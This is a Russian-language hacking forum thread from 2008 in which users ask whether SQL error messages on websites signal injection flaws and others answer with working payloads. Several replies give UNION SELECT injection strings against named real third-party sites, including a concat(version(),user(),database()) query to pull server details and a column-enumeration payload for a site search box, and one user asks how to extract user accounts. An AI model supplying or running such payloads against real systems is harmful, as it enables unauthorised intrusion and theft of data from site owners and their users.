HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.07.2008, 15:49
P(i)n*Fl0p1
Участник форума
Регистрация: 19.12.2006
Сообщений: 173
Провел на форуме:
1812111

Репутация: 125
По умолчанию

mySQL query error: INSERT INTO ibf_pfields_content (field_1,field_2,field_3,field_4,member_id) VALUES('от верблюда-\','l','','',7463)

mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'l','','',7463)' at line 1
mySQL error code:
Date: Saturday 05th 2008f July 2008 03:39:04 PM


подскажите это уязвимость?)))))))прошу не обзываться)
вообщем если уязвимость то
вызвало её вот это при регистрации



в личку могу сказать некоторым где это)

Последний раз редактировалось P(i)n*Fl0p1; 05.07.2008 в 16:00..
 
Ответить с цитированием

  #2  
Старый 05.07.2008, 22:13
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Цитата:
Сообщение от P(i)n*Fl0p1  
mySQL query error: INSERT INTO ibf_pfields_content (field_1,field_2,field_3,field_4,member_id) VALUES('от верблюда-\','l','','',7463)


подскажите это уязвимость?)))))))
И вполне уязвимость, ошибка т.к. ты заэкранировал '. Попробуй передать \' , и посмотри что будет, вполне возможно, что кавычка будет экранироваться, но ты это экранирование убъёшь при помощи \., т.е. получится \\' , а значит ' - будет частью команды SQL, а не просто текстовым символом.

А может и ' не заэкранируется вообще, тогда ещё проще.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #3  
Старый 05.07.2008, 16:02
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Не уязвимость. Просто ошибка. Что то ты с синтаксисом намудрил
__________________
..
 
Ответить с цитированием

  #4  
Старый 06.07.2008, 03:08
Flash-ICE
Banned
Регистрация: 12.11.2007
Сообщений: 20
Провел на форуме:
318975

Репутация: 5
По умолчанию

http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*

Не могу работать с 1 колонкой как выводить юзеров я даж не представляю

ЗЫ глядим в заголовок
 
Ответить с цитированием

  #5  
Старый 06.07.2008, 03:15
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от Flash-ICE  
http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*

Не могу работать с 1 колонкой как выводить юзеров я даж не представляю

ЗЫ глядим в заголовок
исполбзуй конструкцию concat, например так:
Цитата:
http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,concat(version(),0x3a3a,user(), 0x3a3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6/*
 
Ответить с цитированием

  #6  
Старый 06.07.2008, 04:15
Flash-ICE
Banned
Регистрация: 12.11.2007
Сообщений: 20
Провел на форуме:
318975

Репутация: 5
По умолчанию

а как ее юзать??? Точнее почему иногда ставиться в скобках 0x3a3a или shar (58) Где про это можно почитать
 
Ответить с цитированием

  #7  
Старый 06.07.2008, 04:26
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
Сообщение от Flash-ICE  
а как ее юзать??? Точнее почему иногда ставиться в скобках 0x3a3a или shar (58) Где про это можно почитать
0x3a3a - это шестнадцтиричный код без 0x ..
shar (58) - пишется char(58) - 58 это ascii код двоеточия :
как я понял тебе интересно зачем это используется в скулях - так вот - это пишут для разделения полученых данных ..
0x3a ничем не отличается от char(58) ..

Последний раз редактировалось 159932; 06.07.2008 в 04:30..
 
Ответить с цитированием

  #8  
Старый 06.07.2008, 06:00
teen4jump
Новичок
Регистрация: 02.07.2008
Сообщений: 1
Провел на форуме:
32531

Репутация: 0
По умолчанию

В поиске _http://investoru.info пишу '... вылазит:
'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and (hl_listings.expiration = 0 || date_a' at line 13'
Это уязвимость?
 
Ответить с цитированием

  #9  
Старый 06.07.2008, 06:59
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


По умолчанию

Цитата:
Сообщение от teen4jump  
В поиске _http://investoru.info пишу '... вылазит:
'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and (hl_listings.expiration = 0 || date_a' at line 13'
Это уязвимость?
Да, простенькая инъекция, введи в поиске:
Код:
1') union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
29 поле выводится
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #10  
Старый 06.07.2008, 10:27
Flash-ICE
Banned
Регистрация: 12.11.2007
Сообщений: 20
Провел на форуме:
318975

Репутация: 5
По умолчанию

gisTy чет не допонял как вывести все таки можешь намекнешь?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.